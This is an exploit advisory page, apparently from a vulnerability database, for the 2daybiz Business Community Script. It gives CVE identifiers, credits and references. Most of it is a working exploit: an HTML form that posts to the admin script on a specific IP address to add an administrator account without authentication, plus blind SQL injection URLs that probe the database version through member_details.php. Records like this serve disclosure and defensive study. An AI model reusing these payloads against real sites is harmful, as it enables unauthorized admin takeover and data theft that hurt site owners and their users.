2daybiz Business Community Script Multiple Remote Vulnerabilities

2009.05.18
Credit: TiGeR-Dz
Risk: High
Local: No
Remote: Yes
CVE: CVE-2009-1651 | CVE-2009-1652
CWE: CWE-89

------------------------------------------------------------------------------------------------------------- 2daybiz Business Community Script (adminaddeditdetails.php) Add Admin / Remote Blind SQL Injection Exploit ---------------------------------------------------------------------------------------------------- Founder: TiGeR-Dz Script:Business Community Script Home:http://www.2daybiz.com/ Download:http://www.2daybiz.com/business_comm_download.html -------------------------------------------------------------------------------------------------- 1/Add Admin Exploit: ---------------------------------------------------------------- <p align="center"> <body bgcolor="#000000"> </p> <p>&nbsp;</p> <p><font size="5" color="#FF0000">CoD3d By </font> <font color="#FFFFFF" size="5">:TiGeR.dZ</font></p> <form id="form1" name="editinguser" method="post" action="http://98.131.92.231/products/businesscommunity/admin/adminaddeditdetails.php?adduser" onsubmit="return editvalidateform();"> <table width="100%" border="0" align="center" cellpadding="5" cellspacing="0" class="blue_border"> <tr> <td colspan="3"><div align="center" class="gblue_bg"> <font size="5" color="#FF0000">Add User </font> </div></td> </tr> <tr> <td colspan="3">&nbsp;</td> </tr> <tr> <td width="19%">&nbsp;</td> <td width="28%" align="left" class="yoda"> <font color="#FF0000" size="4">Username</font></td> <td width="50%" align="left"><label> <input name="username" type="text" id="username" size="25" /> </label> </td> </tr> <tr> <td class="yoda" width="19%">&nbsp;</td> <td align="left" class="yoda"> <font color="#FF0000" size="4">Password</font></td> <td align="left"><label> <input name="password" type="password" id="password" size="25" /> </label></td> </tr> <tr> <td class="yoda" width="19%">&nbsp;</td> <td align="left" class="yoda"> <font color="#FF0000" size="4">Name </font> </td> <td align="left"><label> <input name="name" type="text" id="name" size="25" /> </label></td> </tr> <tr> <td class="yoda" width="19%">&nbsp;</td> <td align="left" class="yoda"> <font color="#FF0000" size="4">Email</font></td> <td align="left"><label> <input name="email" type="text" size="25" /> </label></td> </tr> <tr> <td colspan="2" class="yoda">&nbsp;</td> <td>&nbsp;</td> </tr> <tr> <td colspan="3" class="yoda"><label> <div align="center"> <input type="submit" name="Submit" value="Add User" /> </div> </label></td> </tr> </html> --------------------------------------------------------------------------------------------------------------------------------------------------- 2/ Remote Blind SQL Injection Exploit: ------------------------------------------- Note: this gaps is Exist within the file of the control panel (adminaddeditdetails.php) :) 1/http://98.131.92.231/products/businesscommunity/admin/member_details.php?mid=1+and+substring(@@version,1,1)=4 False 2/http://98.131.92.231/products/businesscommunity/admin/member_details.php?mid=1+and+substring(@@version,1,1)=5 True ------------------------------------------------------------------------------------------------------------------------------------------ www.h4ckf0ru.com # -----------------------------------------------------------------------------------------------------------------------------------

References:

http://www.securityfocus.com/bid/34976
http://www.milw0rm.com/exploits/8689
http://secunia.com/advisories/35071


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top